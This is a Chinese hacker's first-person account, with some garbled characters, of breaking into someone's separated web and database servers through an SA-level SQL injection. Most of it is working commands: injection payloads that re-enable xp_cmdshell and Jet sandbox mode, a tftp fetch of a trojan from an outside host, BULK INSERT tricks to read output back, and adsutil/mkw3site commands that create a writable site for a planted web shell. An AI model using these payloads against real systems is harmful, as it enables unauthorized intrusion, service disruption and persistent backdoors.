記一次巧妙的hacking~
by netpatch 
那天，正在看資料，朋友丟了個(gè)URL過(guò)來(lái)，說(shuō)是SA注入點(diǎn)，但數(shù)據(jù)庫(kù)和WEB分離的，搞了半天沒(méi)搞定。
我一聽(tīng)，SA注入點(diǎn)，應(yīng)該很容易的說(shuō)，于是就很隨意的說(shuō)，OK，沒(méi)問(wèn)題，等會(huì)給結(jié)果~
手工大概的判斷了下，的確是個(gè)SA注入點(diǎn)。判斷過(guò)程偶就不寫(xiě)了，精彩的地方當(dāng)然要留到后面啦
操起NBSI這把大刀就開(kāi)工了。首先嘗試恢復(fù)xp_cmdshell和sp_OACreate兩擴(kuò)展存儲(chǔ),恢復(fù)后用兩擴(kuò)展存儲(chǔ)隨意執(zhí)行了一個(gè)命令，但是從回顯結(jié)果來(lái)判斷，
命令沒(méi)有成功執(zhí)行。于是又恢復(fù)xp_servicecontrol擴(kuò)展存儲(chǔ)，由于該擴(kuò)展存儲(chǔ)沒(méi)有回顯，偶就隨意的ECHO了一個(gè)文件到一個(gè)指定目錄
然后用列目錄的功能把那目錄列了一遍，但并未發(fā)現(xiàn)寫(xiě)入的文件。心想，應(yīng)該是管理員把那幾個(gè)常用的hacking擴(kuò)展存儲(chǔ)都給X了吧。
不知道xp_regwrite擴(kuò)展存儲(chǔ)被X了沒(méi)。于是乎，手工開(kāi)啟了沙盒模式
asp?idx=32;exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;-- 
然后嘗試用沙盒模式往指定目錄ECHO了個(gè)文件。
asp?idx=32 and 0<>(select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd /c echo xx 
>c:\xxx\xxx.txt")'))-- 
再用列目錄的功能把該目錄給列了一遍，發(fā)現(xiàn)ECHO命令執(zhí)行成功！HOHO，還好管理員沒(méi)把這個(gè)擴(kuò)展存儲(chǔ)給X了。
有了可執(zhí)行命令的擴(kuò)展存儲(chǔ)，就有了一線希望。于是想到直接用tftp UP個(gè)馬上去。。執(zhí)行tftp -i ip get muma.exe c:\muma.exe發(fā)現(xiàn)一點(diǎn)反映也沒(méi)有。
猜測(cè)可能被管理員限制或DEL了。于是寫(xiě)了一句話的下載VBS，執(zhí)行后，老半天沒(méi)發(fā)現(xiàn)我們的馬兒，難道，難道他不能訪問(wèn)外網(wǎng)？
于是，我又執(zhí)行了IPCONGFIG命令，并ECHO到np.tmp臨時(shí)文件。可是我們看不到ECHO的內(nèi)容，怎么才能得到數(shù)據(jù)庫(kù)服務(wù)器的IP呢？嘿嘿，想想，他NBSI為什么能回顯呢
？我們也可以那樣做。
asp?idx=32;CREATE TABLE [NP_ICEHACK](ResultTxt nvarchar(1024) NULL)-- //創(chuàng)建一個(gè)放回顯內(nèi)容的表
asp?idx=32 BULK INSERT [NP_ICEHACK] FROM 'np.tmp' WITH (KEEPNULLS);insert into [NP_ICEHACK] values ('g_over');Alter Table [NP_ICEHACK] add id int 
NOT NULL IDENTITY (1,1)-- //以備份的形式把臨時(shí)文件np.tmp的內(nèi)容寫(xiě)入NP_ICEHACK表中
然后用NBSI直接把該表跑出來(lái)。沒(méi)過(guò)一會(huì)，可愛(ài)的IP就浮現(xiàn)在我的面前。于是再操起nmap，一陣掃描。不過(guò)掃描結(jié)果有點(diǎn)意外。就開(kāi)了個(gè)80。
難道數(shù)據(jù)庫(kù)沒(méi)分離？PING下域名其IP和得到的數(shù)據(jù)庫(kù)IP是不一樣的。不管三七二十一了，先訪問(wèn)再說(shuō)。。馬上打上IP訪問(wèn)。
發(fā)現(xiàn)一片空白，奇怪！于是再隨意打上個(gè)目錄，還是空白。傻眼了。這這。。。這端口根據(jù)nmap的判斷是IIS 5.0啊，難道誤報(bào)？
突想，試下不就知道了。怎么個(gè)試法呢？嘿嘿，我用沙盒模式執(zhí)行了net stop w3svc命令(停止整個(gè)WEB服務(wù))。再訪問(wèn)80一看。YES，訪問(wèn)不到了。連那讓人郁悶的空
白頁(yè)面也消失了?？磥?lái)有戲，于是我再執(zhí)行net start w3svc命令(啟動(dòng)整個(gè)WEB服務(wù)).再訪問(wèn)80一看，No web site is configured at this address.
呀，還有綁定域名，那不是可以做個(gè)虛擬目錄。于是執(zhí)行如下命令，查詢(xún)了幾個(gè)站點(diǎn)配置(把1依次往上加就可以看別的站點(diǎn)的配置情況)
cmd /c Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs GET W3SVC/1/ServerBindings
查看第一個(gè)虛擬web站點(diǎn)的邦定端口。這里的W3SVC/1是IIS:\ LocalHostW3SVC/1的簡(jiǎn)寫(xiě)，而ServerBindings是他的屬性
還是用NBSI列出來(lái)，列到3時(shí)，發(fā)現(xiàn)其綁定了一個(gè)域名，于是執(zhí)行如下命令，添加虛擬目錄
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/3/Root/np "IIsWebVirtualDir"
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/root/np/Path "C:\"： 
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessRead 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessWrite 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessScript 1 
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/EnableDirBrowsing 1
Cscript.exe c:\Inetpub\AdminScripts\adsutil.vbs SET w3svc/3/Root/np/AccessSource 1
添加后高興的去訪問(wèn)那域名www.xxx.com/np/結(jié)果發(fā)現(xiàn)還是www.xxx.com的內(nèi)容，懷疑沒(méi)加成功，于是隨便訪問(wèn)了一個(gè)目錄，發(fā)現(xiàn)還是www.xxx.com的內(nèi)容
難道是把所有的都轉(zhuǎn)發(fā)到www.xxx.com???于是本地搭平臺(tái)測(cè)試ING。。發(fā)現(xiàn)果然如自己所料，被轉(zhuǎn)發(fā)了。
絕。。居然這樣。。經(jīng)過(guò)一段時(shí)間的思考，腦筋一轉(zhuǎn)，心想：你不讓我訪問(wèn)這個(gè)站，行。。我應(yīng)承你，我自己建個(gè)站去，看你轉(zhuǎn)。哼~
于是立即執(zhí)行如下命令
cmd /c cscript c:\Inetpub\AdminScripts\mkw3site.vbs -r "c:\" -t "test" -c "LocalHost" -o "80" -h "netpatch.xx.com"
把自己的域名綁定該數(shù)據(jù)庫(kù)服務(wù)器IP。再訪問(wèn)netpatch.xx.com HOHO，終于可以了。
于是立即ECHO了一句話?cǎi)R上去，結(jié)束了這次hacing之旅.
BTW:其實(shí)，在此次的hacking中碰到很多問(wèn)題，也查閱了許多相關(guān)資料，搭平臺(tái)測(cè)試了N遍才測(cè)試OK的。并沒(méi)有文章里那么順利。
難度在于，對(duì)方只開(kāi)了80且把僅有的WEB給轉(zhuǎn)發(fā)了，而且又不能訪問(wèn)外網(wǎng)。
____ by NetPatch www.icehack.com & [P.T.U]
如要轉(zhuǎn)載，請(qǐng)保持文章完整。謝謝合作！

最新評(píng)論